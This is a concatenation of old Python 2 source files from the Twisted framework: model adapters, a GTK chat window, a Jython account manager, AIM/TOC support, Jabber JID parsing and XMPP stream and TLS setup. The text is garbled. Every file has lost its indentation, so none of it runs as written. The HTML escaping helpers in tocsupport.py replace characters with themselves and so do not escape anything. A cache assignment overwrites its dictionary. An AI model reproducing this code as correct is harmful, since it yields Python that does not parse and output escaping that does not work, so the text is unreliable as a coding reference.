def getSubmodel(self, request=None, name=None):
if name is None and type(request) is type(""):
warnings.warn("Warning!")
name = request
request = None
if self.submodels.has_key(name):
return self.submodels[name]
value = getattr(self.original, name)
if callable(value):
return value()
sm = adaptToIModel(value, self, name)
self.submodels = sm
return sm
class DeferredWrapper(Wrapper):
def setData(self, request=None, data=_Nothing):
if data is _Nothing:
warnings.warn("setData should be called with request as first arg")
data = request
request = None
if isinstance(data, defer.Deferred):
self.original = data
else:
views, subviews = self.views, self.subviews
new = adaptToIModel(data, self.parent, self.name)
self.__class__ = new.__class__
self.__dict__ = new.__dict__
self.views, self.subviews = views, subviews
class Link(AttributeModel):
def __init__(self, href, text):
AttributeModel.__init__(self)
self.href = href
self.text = text
try:
components.registerAdapter(StringModel, types.StringType, interfaces.IModel)
components.registerAdapter(ListModel, types.ListType, interfaces.IModel)
components.registerAdapter(ListModel, types.TupleType, interfaces.IModel)
components.registerAdapter(DictionaryModel, types.DictionaryType, interfaces.IModel)
components.registerAdapter(DeferredWrapper, defer.Deferred, interfaces.IModel)
components.registerAdapter(DeferredWrapper, defer.DeferredList, interfaces.IModel)
except ValueError:
# The adapters were already registered
pass
```
#### File: words/im/gtkcommon.py
```python
import os, re
from twisted.python import reflect
from twisted.python import util
from twisted.manhole.ui.pywidgets import isCursorOnFirstLine, isCursorOnLastLine
import string
import gtk
from libglade import GladeXML
GLADE_FILE = util.sibpath(__file__, "instancemessenger.glade")
SETTINGS_FILE = os.path.expanduser("~/.InstanceMessenger")
OFFLINE = 0
ONLINE = 1
AWAY = 2
True = gtk.TRUE
False = gtk.FALSE
class InputOutputWindow:
def __init__(self, rootName, inputName, outputName):
self.xml = openGlade(GLADE_FILE, root=rootName)
wid = self.xml.get_widget
self.entry = wid(inputName)
#self.entry.set_word_wrap(gtk.TRUE)
self.output = wid(outputName)
#self.output.set_word_wrap(gtk.TRUE)
self.widget = wid(rootName)
self.history = []
self.histpos = 0
self.linemode = True
self.currentlyVisible = 0
self.win = None
autoConnectMethods(self)
def show(self):
if not self.currentlyVisible:
self.win = w = gtk.GtkWindow(gtk.WINDOW_TOPLEVEL)
self.connectid = w.connect("destroy", self.hidden)
w.add(self.widget)
w.set_title(self.getTitle())
w.show_all()
self.entry.grab_focus()
self.currentlyVisible = 1
def hidden(self, w):
self.win = None
w.remove(self.widget)
self.currentlyVisible = 0
def hide(self):
if self.currentlyVisible:
self.win.remove(self.widget)
self.currentlyVisible = 0
self.win.disconnect(self.connectid)
self.win.destroy()
def handle_key_press_event(self, entry, event):
stopSignal = False
# ASSUMPTION: Assume Meta == mod4
isMeta = event.state & gtk.GDK.MOD4_MASK
##
# Return handling
##
if event.keyval == gtk.GDK.Return:
isShift = event.state & gtk.GDK.SHIFT_MASK
if isShift:
self.linemode = True
entry.insert_defaults('\n')
else:
stopSignal = True
text = entry.get_chars(0,-1)
if not text:
return
self.entry.delete_text(0, -1)
self.linemode = False
self.sendText(text)
self.history.append(text)
self.histpos = len(self.history)
##
# History handling
##
elif ((event.keyval == gtk.GDK.Up and isCursorOnFirstLine(entry))
or (isMeta and event.string == 'p')):
print "history up"
self.historyUp()
stopSignal = True
elif ((event.keyval == gtk.GDK.Down and isCursorOnLastLine(entry))
or (isMeta and event.string == 'n')):
print "history down"
self.historyDown()
stopSignal = True
##
# Tab Completion
##
elif event.keyval == gtk.GDK.Tab:
oldpos = entry.get_point()
word, pos = self.getCurrentWord(entry)
result = self.tabComplete(word)
#If there are multiple potential matches, then we spit
#them out and don't insert a tab, so the user can type
#a couple more characters and try completing again.
if len(result) > 1:
for nick in result:
self.output.insert_defaults(nick + " ")
self.output.insert_defaults('\n')
stopSignal = True
elif result: #only happens when len(result) == 1
entry.freeze()
entry.delete_text(*pos)
entry.set_position(pos[0])
entry.insert_defaults(result[0])
entry.set_position(oldpos+len(result[0])-len(word))
entry.thaw()
stopSignal = True
if stopSignal:
entry.emit_stop_by_name("key_press_event")
return True
def tabComplete(self, word):
"""Override me to implement tab completion for your window,
I should return a list of potential matches."""
return []
def getCurrentWord(self, entry):
i = entry.get_point()
text = entry.get_chars(0,-1)
word = re.split(r'\s', text)[-1]
start = string.rfind(text, word)
end = start+len(word)
return (word, (start, end))
def historyUp(self):
if self.histpos > 0:
self.entry.delete_text(0, -1)
self.histpos = self.histpos - 1
self.entry.insert_defaults(self.history[self.histpos])
self.entry.set_position(0)
def historyDown(self):
if self.histpos < len(self.history) - 1:
self.histpos = self.histpos + 1
self.entry.delete_text(0, -1)
self.entry.insert_defaults(self.history[self.histpos])
elif self.histpos == len(self.history) - 1:
self.histpos = self.histpos + 1
self.entry.delete_text(0, -1)
def createMethodDict(o, d=None):
if d is None:
d = {}
for base in reflect.allYourBase(o.__class__) + [o.__class__]:
for n in dir(base):
m = getattr(o, n)
#print 'd[%s] = %s' % (n, m)
d[n] = m
#print d
return d
def autoConnectMethods(*objs):
o = {}
for obj in objs:
createMethodDict(obj, o)
# print 'connecting', o
objs[0].xml.signal_autoconnect(o)
def openGlade(*args, **kwargs):
# print "opening glade file"
r = GladeXML(*args, **kwargs)
if r._o:
return r
else:
raise IOError("Couldn't open Glade XML: %s; %s" % (args, kwargs))
```
#### File: words/im/jyaccount.py
```python
from twisted.words.im.baseaccount import AccountManager
from twisted.words.im.pbsupport import PBAccount
from twisted.words.im.tocsupport import TOCAccount
from twisted.words.im.ircsupport import IRCAccount
import twisted.words.im.jychat
from java.awt import GridLayout, FlowLayout, BorderLayout, Container
import sys
from java.awt.event import ActionListener
from javax.swing import JTextField, JPasswordField, JComboBox, JPanel, JLabel,\
JCheckBox, JFrame, JButton, BoxLayout, JTable, JScrollPane, \
ListSelectionModel
from javax.swing.border import TitledBorder
from javax.swing.table import DefaultTableModel
doublebuffered = 0
stype = "twisted.words"
class NewAccountGUI:
def __init__(self, amgui):
self.amgui = amgui
self.am = amgui.acctmanager
self.buildgwinfo()
self.autologin = JCheckBox("Automatically Log In")
self.acctname = JTextField()
self.gwoptions = JPanel(doublebuffered)
self.gwoptions.border = TitledBorder("Gateway Options")
self.buildgwoptions("Twisted")
self.mainframe = JFrame("New Account Window")
self.buildpane()
def buildgwinfo(self):
self.gateways = {"Twisted" : {"ident" : JTextField(),
"passwd" : JPasswordField(),
"host" : JTextField("twistedmatrix.com"),
"port" : JTextField("8787"),
"service" : JTextField("twisted.words"),
"persp" : JTextField()},
"AIM" : {"ident" : JTextField(),
"passwd" : JPasswordField(),
"host" : JTextField("toc.oscar.aol.com"),
"port" : JTextField("9898")},
"IRC" : {"ident" : JTextField(),
"passwd" : JPasswordField(),
"host" : JTextField(),
"port" : JTextField("6667"),
"channels" : JTextField()}
}
self.displayorder = { "Twisted" : [["Identity Name", "ident"],
["Password", "<PASSWORD>"],
["Host", "host"],
["Port", "port"],
["Service Name", "service"],
["Perspective Name", "persp"]],
"AIM" : [["Screen Name", "ident"],
["Password", "<PASSWORD>"],
["Host", "host"],
["Port", "port"]],
"IRC" : [["Nickname", "ident"],
["Password", "<PASSWORD>"],
["Host", "host"],
["Port", "port"],
["Channels", "channels"]]
}
def buildgwoptions(self, gw):
self.gwoptions.removeAll()
self.gwoptions.layout = GridLayout(len(self.gateways[gw]), 2)
for mapping in self.displayorder[gw]:
self.gwoptions.add(JLabel(mapping[0]))
self.gwoptions.add(self.gateways[gw][mapping[1]])
def buildpane(self):
gw = JPanel(GridLayout(1, 2), doublebuffered)
gw.add(JLabel("Gateway"))
self.gwlist = JComboBox(self.gateways.keys())#, actionPerformed=self.changegw)
self.gwlist.setSelectedItem("Twisted")
gw.add(self.gwlist)
stdoptions = JPanel(GridLayout(2, 2), doublebuffered)
stdoptions.border = TitledBorder("Standard Options")
stdoptions.add(JLabel())
stdoptions.add(self.autologin)
stdoptions.add(JLabel("Account Name"))
stdoptions.add(self.acctname)
buttons = JPanel(FlowLayout(), doublebuffered)
buttons.add(JButton("OK", actionPerformed=self.addaccount))
buttons.add(JButton("Cancel", actionPerformed=self.cancel))
mainpane = self.mainframe.getContentPane()
mainpane.layout = BoxLayout(mainpane, BoxLayout.Y_AXIS)
mainpane.add(gw)
mainpane.add(self.gwoptions)
mainpane.add(stdoptions)
mainpane.add(buttons)
def show(self):
self.mainframe.setLocation(100, 100)
self.mainframe.pack()
self.mainframe.show()
#actionlisteners
def changegw(self, ae):
self.buildgwoptions(self.gwlist.getSelectedItem())
self.mainframe.pack()
self.mainframe.show()
def addaccount(self, ae):
gwselection = self.gwlist.getSelectedItem()
gw = self.gateways[gwselection]
name = gw["ident"].text
passwd = gw["passwd"].text
host = gw["host"].text
port = int(gw["port"].text)
autologin = self.autologin.isSelected()
acctname = self.acctname.text
if gwselection == "Twisted":
sname = gw["service"].text
perspective = gw["persp"].text
self.am.addAccount(PBAccount(acctname, autologin, name, passwd,
host, port,
[[stype, sname, perspective]]))
elif gwselection == "AIM":
self.am.addAccount(TOCAccount(acctname, autologin, name, passwd,
host, port))
elif gwselection == "IRC":
channels = gw["channels"].text
self.am.addAccount(IRCAccount(acctname, autologin, name, passwd,
host, port, channels))
self.amgui.update()
print "Added new account"
self.mainframe.dispose()
def cancel(self, ae):
print "Cancelling new account creation"
self.mainframe.dispose()
class UneditableTableModel(DefaultTableModel):
def isCellEditable(self, x, y):
return 0
class AccountManagementGUI:
def __init__(self):
self.acctmanager = AccountManager()
self.mainframe = JFrame("Account Manager")
self.chatui = None
self.headers = ["Account Name", "Status", "Autologin", "Gateway"]
self.data = UneditableTableModel([], self.headers)
self.table = JTable(self.data)
self.table.columnSelectionAllowed = 0 #cannot select columns
self.table.selectionMode = ListSelectionModel.SINGLE_SELECTION
self.connectbutton = JButton("Connect", actionPerformed=self.connect)
self.dconnbutton = JButton("Disconnect", actionPerformed=self.disconnect)
self.deletebutton = JButton("Delete", actionPerformed=self.deleteAccount)
self.buildpane()
self.mainframe.pack()
self.mainframe.show()
def buildpane(self):
buttons = JPanel(FlowLayout(), doublebuffered)
buttons.add(self.connectbutton)
buttons.add(self.dconnbutton)
buttons.add(JButton("New", actionPerformed=self.addNewAccount))
buttons.add(self.deletebutton)
buttons.add(JButton("Quit", actionPerformed=self.quit))
mainpane = self.mainframe.getContentPane()
mainpane.layout = BoxLayout(mainpane, BoxLayout.Y_AXIS)
mainpane.add(JScrollPane(self.table))
mainpane.add(buttons)
self.update()
def update(self):
self.data.setDataVector(self.acctmanager.getSnapShot(), self.headers)
if self.acctmanager.isEmpty():
self.deletebutton.setEnabled(0)
self.connectbutton.setEnabled(0)
self.dconnbutton.setEnabled(0)
else:
self.deletebutton.setEnabled(1)
if not 1 in self.acctmanager.getConnectionInfo(): #all disconnected
self.dconnbutton.setEnabled(0)
self.connectbutton.setEnabled(1)
elif not 0 in self.acctmanager.getConnectionInfo(): #all connected
self.dconnbutton.setEnabled(1)
self.connectbutton.setEnabled(0)
else:
self.dconnbutton.setEnabled(1)
self.connectbutton.setEnabled(1)
#callable button actions
def connect(self, ae):
print "Trying to connect"
row = self.table.getSelectedRow()
if row < 0:
print "Trying to connect to an account but no account selected"
else:
acctname = self.data.getValueAt(row, 0)
if not self.chatui:
self.chatui = twisted.words.im.jychat.JyChatUI()
self.acctmanager.connect(acctname, self.chatui)
self.update()
def disconnect(self, ae):
print "Trying to disconnect"
row = self.table.getSelectedRow()
if row < 0:
print "Trying to logoff an account but no account was selected."
else:
acctname = self.data.getValueAt(row, 0)
self.acctmanager.disconnect(acctname)
self.update()
def addNewAccount(self, ae):
print "Starting new account creation"
NewAccountGUI(self).show()
def deleteAccount(self, ae):
print "Deleting account"
row = self.table.getSelectedRow()
if row < 0:
print "Trying to delete an account but no account selected"
else:
acctname = self.data.getValueAt(row, 0)
self.acctmanager.delAccount(acctname)
self.update()
def quit(self, ae):
self.acctmanager.quit()
sys.exit()
if __name__ == "__main__":
n = AccountManagementGUI()
```
#### File: words/im/tocsupport.py
```python
import string, re
from zope.interface import implements
# Twisted Imports
from twisted.words.protocols import toc
from twisted.words.im.locals import ONLINE, OFFLINE, AWAY
from twisted.internet import defer, reactor, protocol
from twisted.internet.defer import succeed
# Sibling Imports
from twisted.words.im import basesupport, interfaces, locals
def dehtml(text):
text=string.replace(text,"<br>","\n")
text=string.replace(text,"<BR>","\n")
text=string.replace(text,"<Br>","\n") # XXX make this a regexp
text=string.replace(text,"<bR>","\n")
text=re.sub('<.*?>','',text)
text=string.replace(text,'>','>')
text=string.replace(text,'<','<')
text=string.replace(text,'&','&')
text=string.replace(text,' ',' ')
text=string.replace(text,'"','"')
return text
def html(text):
text=string.replace(text,'"','"')
text=string.replace(text,'&','&')
text=string.replace(text,'<','<')
text=string.replace(text,'>','>')
text=string.replace(text,"\n","<br>")
return '<font color="#000000" back="#ffffff" size=3>%s</font>'%text
class TOCPerson(basesupport.AbstractPerson):
def isOnline(self):
return self.status != OFFLINE
def getStatus(self):
return self.status
def getIdleTime(self):
return str(self.idletime)
def setStatusAndIdle(self, status, idletime):
if self.account.client is None:
raise locals.OfflineError
self.status = status
self.idletime = idletime
self.account.client.chat.getContactsList().setContactStatus(self)
def sendMessage(self, text, meta=None):
if self.account.client is None:
raise locals.OfflineError
if meta:
if meta.get("style", None) == "emote":
text="* "+text+"* "
self.account.client.say(self.name,html(text))
return succeed(text)
class TOCGroup(basesupport.AbstractGroup):
implements(interfaces.IGroup)
def __init__(self, name, tocAccount):
basesupport.AbstractGroup.__init__(self, name, tocAccount)
self.roomID = self.client.roomID[self.name]
def sendGroupMessage(self, text, meta=None):
if self.account.client is None:
raise locals.OfflineError
if meta:
if meta.get("style", None) == "emote":
text="* "+text+"* "
self.account.client.chat_say(self.roomID,html(text))
return succeed(text)
def leave(self):
if self.account.client is None:
raise locals.OfflineError
self.account.client.chat_leave(self.roomID)
class TOCProto(basesupport.AbstractClientMixin, toc.TOCClient):
def __init__(self, account, chatui, logonDeferred):
toc.TOCClient.__init__(self, account.username, account.password)
basesupport.AbstractClientMixin.__init__(self, account, chatui,
logonDeferred)
self.roomID = {}
self.roomIDreverse = {}
def _debug(self, m):
pass #print '<toc debug>', repr(m)
def getGroupConversation(self, name, hide=0):
return self.chat.getGroupConversation(
self.chat.getGroup(name, self), hide)
def addContact(self, name):
self.add_buddy([name])
if not self._buddylist.has_key('TwistedIM'):
self._buddylist['TwistedIM'] = []
if name in self._buddylist['TwistedIM']:
# whoops, don't add again
return
self._buddylist['TwistedIM'].append(name)
self.set_config(self._config_mode, self._buddylist, self._permit, self._deny)
def getPerson(self,name):
return self.chat.getPerson(name, self)
def onLine(self):
self.account._isOnline = 1
#print '$$!&*$&!(@$*& TOC ONLINE *!#@&$(!*%&'
def gotConfig(self, mode, buddylist, permit, deny):
#print 'got toc config', repr(mode), repr(buddylist), repr(permit), repr(deny)
self._config_mode = mode
self._buddylist = buddylist
self._permit = permit
self._deny = deny
if permit:
self._debug('adding permit')
self.add_permit(permit)
if deny:
self._debug('adding deny')
self.add_deny(deny)
clist=[]
for k in buddylist.keys():
self.add_buddy(buddylist[k])
for name in buddylist[k]:
self.getPerson(name).setStatusAndIdle(OFFLINE, '--')
self.signon()
name = None
def tocNICK(self,data):
if not self.name:
print 'Waiting for second NICK', data
self.name=data[0]
self.accountName = '%s (TOC)' % self.name
self.chat.getContactsList()
else:
print 'reregistering...?', data
self.name=data[0]
# self.accountName = "%s (TOC)"%data[0]
if self._logonDeferred is not None:
self._logonDeferred.callback(self)
self._logonDeferred = None
### Error Messages
def hearError(self, code, args):
print '*** TOC ERROR ***', repr(code), repr(args)
def hearWarning(self, newamount, username):
print '*** TOC WARNING ***', repr(newamount), repr(username)
### Buddy Messages
def hearMessage(self,username,message,autoreply):
if autoreply:
message='<AUTO-REPLY>: '+message
self.chat.getConversation(self.getPerson(username)
).showMessage(dehtml(message))
def updateBuddy(self,username,online,evilness,signontime,idletime,userclass,away):
if away:
status=AWAY
elif online:
status=ONLINE
else:
status=OFFLINE
self.getPerson(username).setStatusAndIdle(status, idletime)
### Group Chat
def chatJoined(self, roomid, roomname, users):
self.roomID[roomname]=roomid
self.roomIDreverse[roomid]=roomname
self.getGroupConversation(roomname).setGroupMembers(users)
def chatUpdate(self,roomid,member,inroom):
group=self.roomIDreverse[roomid]
if inroom:
self.getGroupConversation(group).memberJoined(member)
else:
self.getGroupConversation(group).memberLeft(member)
def chatHearMessage(self, roomid, username, message):
if toc.normalize(username) == toc.normalize(self.name):
return # ignore the message
group=self.roomIDreverse[roomid]
self.getGroupConversation(group).showGroupMessage(username, dehtml(message))
def chatHearWhisper(self, roomid, username, message):
print '*** user whispered *** ', roomid, username, message
def chatInvited(self, roomid, roomname, username, message):
print '*** user invited us to chat *** ',roomid, roomname, username, message
def chatLeft(self, roomid):
group=self.roomIDreverse[roomid]
self.getGroupConversation(group,1)
del self.roomID[group]
del self.roomIDreverse[roomid]
def rvousProposal(self,type,cookie,user,vip,port,**kw):
print '*** rendezvous. ***', type, cookie, user, vip, port, kw
def receiveBytes(self, user, file, chunk, sofar, total):
print '*** File transfer! ***', user, file, chunk, sofar, total
def joinGroup(self,name):
self.chat_join(4,toc.normalize(name))
class TOCAccount(basesupport.AbstractAccount):
implements(interfaces.IAccount)
gatewayType = "AIM (TOC)"
_groupFactory = TOCGroup
_personFactory = TOCPerson
def _startLogOn(self, chatui):
logonDeferred = defer.Deferred()
cc = protocol.ClientCreator(reactor, TOCProto, self, chatui,
logonDeferred)
d = cc.connectTCP(self.host, self.port)
d.addErrback(logonDeferred.errback)
return logonDeferred
```
#### File: protocols/jabber/jid.py
```python
from twisted.internet import reactor, protocol, defer
from twisted.words.xish import domish, utility
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep, resourceprep, nameprep
import string
class InvalidFormat(Exception):
pass
def parse(jidstring):
user = None
server = None
resource = None
# Search for delimiters
user_sep = jidstring.find("@")
res_sep = jidstring.find("/")
if user_sep == -1:
if res_sep == -1:
# host
server = jidstring
else:
# host/resource
server = jidstring[0:res_sep]
resource = jidstring[res_sep + 1:] or None
else:
if res_sep == -1:
# user@host
user = jidstring[0:user_sep] or None
server = jidstring[user_sep + 1:]
else:
if user_sep < res_sep:
# user@host/resource
user = jidstring[0:user_sep] or None
server = jidstring[user_sep + 1:user_sep + (res_sep - user_sep)]
resource = jidstring[res_sep + 1:] or None
else:
# server/resource (with an @ in resource)
server = jidstring[0:res_sep]
resource = jidstring[res_sep + 1:] or None
return prep(user, server, resource)
def prep(user, server, resource):
""" Perform stringprep on all JID fragments """
if user:
try:
user = nodeprep.prepare(unicode(user))
except UnicodeError:
raise InvalidFormat, "Invalid character in username"
else:
user = None
if not server:
raise InvalidFormat, "Server address required."
else:
try:
server = nameprep.prepare(unicode(server))
except UnicodeError:
raise InvalidFormat, "Invalid character in hostname"
if resource:
try:
resource = resourceprep.prepare(unicode(resource))
except UnicodeError:
raise InvalidFormat, "Invalid character in resource"
else:
resource = None
return (user, server, resource)
__internJIDs = {}
def internJID(str):
""" Return interned JID.
Assumes C{str} is stringprep'd.
"""
if str in __internJIDs:
return __internJIDs[str]
else:
j = JID(str)
__internJIDs[str] = j
return j
class JID:
""" Represents a stringprep'd Jabber ID.
Note that it is assumed that the attributes C{host}, C{user} and
C{resource}, when set individually, have been properly stringprep'd.
"""
def __init__(self, str = None, tuple = None):
assert (str or tuple)
if str:
user, host, res = parse(str)
else:
user, host, res = prep(*tuple)
self.host = host
self.user = user
self.resource = res
def userhost(self):
if self.user:
return "%s@%s" % (self.user, self.host)
else:
return self.host
def userhostJID(self):
if self.resource:
if "_uhjid" not in self.__dict__:
self._uhjid = internJID(self.userhost())
return self._uhjid
else:
return self
def full(self):
if self.user:
if self.resource:
return "%s@%s/%s" % (self.user, self.host, self.resource)
else:
return "%s@%s" % (self.user, self.host)
else:
if self.resource:
return "%s/%s" % (self.host, self.resource)
else:
return self.host
def __eq__(self, other):
return (self.user == other.user and
self.host == other.host and
self.resource == other.resource)
def __ne__(self, other):
return not (self.user == other.user and
self.host == other.host and
self.resource == other.resource)
```
#### File: protocols/jabber/jstrports.py
```python
from twisted.application import strports
def _parseTCPSSL(factory, domain, port):
""" For the moment, parse TCP or SSL connections the same """
return (domain, int(port), factory), {}
def _parseUNIX(factory, address):
return (address, factory), {}
_funcs = { "tcp" : _parseTCPSSL,
"unix" : _parseUNIX,
"ssl" : _parseTCPSSL }
def parse(description, factory):
args, kw = strports._parse(description)
return (args[0].upper(),) + _funcs[args[0]](factory, *args[1:], **kw)
def client(description, factory):
from twisted.application import internet
name, args, kw = parse(description, factory)
return getattr(internet, name + 'Client')(*args, **kw)
```
#### File: protocols/jabber/xmlstream.py
```python
from zope.interface import directlyProvides, implements
from twisted.internet import defer
from twisted.internet.error import ConnectionLost
from twisted.python import failure
from twisted.words.protocols.jabber import error, ijabber
from twisted.words.xish import domish, xmlstream
from twisted.words.xish.xmlstream import STREAM_CONNECTED_EVENT
from twisted.words.xish.xmlstream import STREAM_START_EVENT
from twisted.words.xish.xmlstream import STREAM_END_EVENT
from twisted.words.xish.xmlstream import STREAM_ERROR_EVENT
try:
from twisted.internet import ssl
except ImportError:
ssl = None
if ssl and not ssl.supported:
ssl = None
STREAM_AUTHD_EVENT = intern("//event/stream/authd")
INIT_FAILED_EVENT = intern("//event/xmpp/initfailed")
NS_STREAMS = 'http://etherx.jabber.org/streams'
NS_XMPP_TLS = 'urn:ietf:params:xml:ns:xmpp-tls'
Reset = object()
def hashPassword(sid, password):
"""
Create a SHA1-digest string of a session identifier and password.
"""
import sha
return sha.new("%s%s" % (sid, password)).hexdigest()
class Authenticator:
"""
Base class for business logic of initializing an XmlStream
Subclass this object to enable an XmlStream to initialize and authenticate
to different types of stream hosts (such as clients, components, etc.).
Rules:
1. The Authenticator MUST dispatch a L{STREAM_AUTHD_EVENT} when the
stream has been completely initialized.
2. The Authenticator SHOULD reset all state information when
L{associateWithStream} is called.
3. The Authenticator SHOULD override L{streamStarted}, and start
initialization there.
@type xmlstream: L{XmlStream}
@ivar xmlstream: The XmlStream that needs authentication
@note: the term authenticator is historical. Authenticators perform
all steps required to prepare the stream for the exchange
of XML stanzas.
"""
def __init__(self):
self.xmlstream = None
def connectionMade(self):
"""
Called by the XmlStream when the underlying socket connection is
in place.
This allows the Authenticator to send an initial root element, if it's
connecting, or wait for an inbound root from the peer if it's accepting
the connection.
Subclasses can use self.xmlstream.send() to send any initial data to
the peer.
"""
def streamStarted(self):
"""
Called by the XmlStream when the stream has started.
A stream is considered to have started when the root element has been
received and, if applicable, the feature set has been received.
"""
def associateWithStream(self, xmlstream):
"""
Called by the XmlStreamFactory when a connection has been made
to the requested peer, and an XmlStream object has been
instantiated.
The default implementation just saves a handle to the new
XmlStream.
@type xmlstream: L{XmlStream}
@param xmlstream: The XmlStream that will be passing events to this
Authenticator.
"""
self.xmlstream = xmlstream
class ConnectAuthenticator(Authenticator):
"""
Authenticator for initiating entities.
"""
namespace = None
def __init__(self, otherHost):
self.otherHost = otherHost
def connectionMade(self):
self.xmlstream.namespace = self.namespace
self.xmlstream.otherHost = self.otherHost
self.xmlstream.sendHeader()
def initializeStream(self):
"""
Perform stream initialization procedures.
An L{XmlStream} holds a list of initializer objects in its
C{initializers} attribute. This method calls these initializers in
order and dispatches the C{STREAM_AUTHD_EVENT} event when the list has
been successfully processed. Otherwise it dispatches the
C{INIT_FAILED_EVENT} event with the failure.
Initializers may return the special L{Reset} object to halt the
initialization processing. It signals that the current initializer was
successfully processed, but that the XML Stream has been reset. An
example is the TLSInitiatingInitializer.
"""
def remove_first(result):
self.xmlstream.initializers.pop(0)
return result
def do_next(result):
"""
Take the first initializer and process it.
On success, the initializer is removed from the list and
then next initializer will be tried.
"""
if result is Reset:
return None
try:
init = self.xmlstream.initializers[0]
except IndexError:
self.xmlstream.dispatch(self.xmlstream, STREAM_AUTHD_EVENT)
return None
else:
d = defer.maybeDeferred(init.initialize)
d.addCallback(remove_first)
d.addCallback(do_next)
return d
d = defer.succeed(None)
d.addCallback(do_next)
d.addErrback(self.xmlstream.dispatch, INIT_FAILED_EVENT)
def streamStarted(self):
self.initializeStream()
class FeatureNotAdvertized(Exception):
"""
Exception indicating a stream feature was not advertized, while required by
the initiating entity.
"""
class BaseFeatureInitiatingInitializer(object):
"""
Base class for initializers with a stream feature.
This assumes the associated XmlStream represents the initiating entity
of the connection.
@cvar feature: tuple of (uri, name) of the stream feature root element.
@type feature: tuple of (L{str}, L{str})
@ivar required: whether the stream feature is required to be advertized
by the receiving entity.
@type required: L{bool}
"""
implements(ijabber.IInitiatingInitializer)
feature = None
required = False
def __init__(self, xs):
self.xmlstream = xs
def initialize(self):
"""
Initiate the initialization.
Checks if the receiving entity advertizes the stream feature. If it
does, the initialization is started. If it is not advertized, and the
C{required} instance variable is L{True}, it raises
L{FeatureNotAdvertized}. Otherwise, the initialization silently
succeeds.
"""
if self.feature in self.xmlstream.features:
return self.start()
elif self.required:
raise FeatureNotAdvertized
else:
return None
def start(self):
"""
Start the actual initialization.
May return a deferred for asynchronous initialization.
"""
class TLSError(Exception):
"""
TLS base exception.
"""
class TLSFailed(TLSError):
"""
Exception indicating failed TLS negotiation
"""
class TLSRequired(TLSError):
"""
Exception indicating required TLS negotiation.
This exception is raised when the receiving entity requires TLS
negotiation and the initiating does not desire to negotiate TLS.
"""
class TLSNotSupported(TLSError):
"""
Exception indicating missing TLS support.
This exception is raised when the initiating entity wants and requires to
negotiate TLS when the OpenSSL library is not available.
"""
class TLSInitiatingInitializer(BaseFeatureInitiatingInitializer):
"""
TLS stream initializer for the initiating entity.
It is strongly required to include this initializer in the list of
initializers for an XMPP stream. By default it will try to negotiate TLS.
An XMPP server may indicate that TLS is required. If TLS is not desired,
set the C{wanted} attribute to False instead of removing it from the list
of initializers, so a proper exception L{TLSRequired} can be raised.
@cvar wanted: indicates if TLS negotiation is wanted.
@type wanted: L{bool}
"""
feature = (NS_XMPP_TLS, 'starttls')
wanted = True
_deferred = None
def onProceed(self, obj):
"""
Proceed with TLS negotiation and reset the XML stream.
"""
self.xmlstream.removeObserver('/failure', self.onFailure)
ctx = ssl.CertificateOptions()
self.xmlstream.transport.startTLS(ctx)
self.xmlstream.reset()
self.xmlstream.sendHeader()
self._deferred.callback(Reset)
def onFailure(self, obj):
self.xmlstream.removeObserver('/proceed', self.onProceed)
self._deferred.errback(TLSFailed())
def start(self):
"""
Start TLS negotiation.
This checks if the receiving entity requires TLS, the SSL library is
available and uses the C{required} and C{wanted} instance variables to
determine what to do in the various different cases.
For example, if the SSL library is not available, and wanted and
required by the user, it raises an exception. However if it is not
required by both parties, initialization silently succeeds, moving
on to the next step.
"""
if self.wanted:
if ssl is None:
if self.required:
return defer.fail(TLSNotSupported())
else:
return defer.succeed(None)
else:
pass
elif self.xmlstream.features[self.feature].required:
return defer.fail(TLSRequired())
else:
return defer.succeed(None)
self._deferred = defer.Deferred()
self.xmlstream.addOnetimeObserver("/proceed", self.onProceed)
self.xmlstream.addOnetimeObserver("/failure", self.onFailure)
self.xmlstream.send(domish.Element((NS_XMPP_TLS, "starttls")))
return self._deferred
class XmlStream(xmlstream.XmlStream):
"""
XMPP XML Stream protocol handler.
@ivar version: XML stream version as a tuple (major, minor). Initially,
this is set to the minimally supported version. Upon
receiving the stream header of the peer, it is set to the
minimum of that value and the version on the received
header.
@type version: (L{int}, L{int})
@ivar namespace: default namespace URI for stream
@type namespace: L{str}
@ivar thisHost: hostname of this entity
@ivar otherHost: hostname of the peer entity
@ivar sid: session identifier
@type sid: L{str}
@ivar initiating: True if this is the initiating stream
@type initiating: L{bool}
@ivar features: map of (uri, name) to stream features element received from
the receiving entity.
@type features: L{dict} of (L{str}, L{str}) to L{domish.Element}.
@ivar prefixes: map of URI to prefixes that are to appear on stream
header.
@type prefixes: L{dict} of L{str} to L{str}
@ivar initializers: list of stream initializer objects
@type initializers: L{list} of objects that provide L{IInitializer}
@ivar authenticator: associated authenticator that uses C{initializers} to
initialize the XML stream.
"""
version = (1, 0)
namespace = 'invalid'
thisHost = None
otherHost = None
sid = None
initiating = True
prefixes = {NS_STREAMS: 'stream'}
_headerSent = False # True if the stream header has been sent
def __init__(self, authenticator):
xmlstream.XmlStream.__init__(self)
self.authenticator = authenticator
self.initializers = []
self.features = {}
# Reset the authenticator
authenticator.associateWithStream(self)
def _callLater(self, *args, **kwargs):
from twisted.internet import reactor
return reactor.callLater(*args, **kwargs)
def reset(self):
"""
Reset XML Stream.
Resets the XML Parser for incoming data. This is to be used after
successfully negotiating a new layer, e.g. TLS and SASL. Note that
registered event observers will continue to be in place.
"""
self._headerSent = False
self._initializeStream()
def onStreamError(self, errelem):
"""
Called when a stream:error element has been received.
Dispatches a L{STREAM_ERROR_EVENT} event with the error element to
allow for cleanup actions and drops the connection.
@param errelem: The received error element.
@type errelem: L{domish.Element}
"""
self.dispatch(failure.Failure(error.exceptionFromStreamError(errelem)),
STREAM_ERROR_EVENT)
self.transport.loseConnection()
def onFeatures(self, features):
"""
Called when a stream:features element has been received.
Stores the received features in the C{features} attribute, checks the
need for initiating TLS and notifies the authenticator of the start of
the stream.
@param features: The received features element.
@type features: L{domish.Element}
"""
self.features = {}
for feature in features.elements():
self.features[(feature.uri, feature.name)] = feature
self.authenticator.streamStarted()
def sendHeader(self):
"""
Send stream header.
"""
rootElem = domish.Element((NS_STREAMS, 'stream'), self.namespace)
if self.initiating and self.otherHost:
rootElem['to'] = self.otherHost
elif not self.initiating:
if self.thisHost:
rootElem['from'] = self.thisHost
if self.sid:
rootElem['id'] = self.sid
if self.version >= (1, 0):
rootElem['version'] = "%d.%d" % (self.version[0], self.version[1])
self.rootElem = rootElem
self.send(rootElem.toXml(prefixes=self.prefixes, closeElement=0))
self._headerSent = True
def sendFooter(self):
"""
Send stream footer.
"""
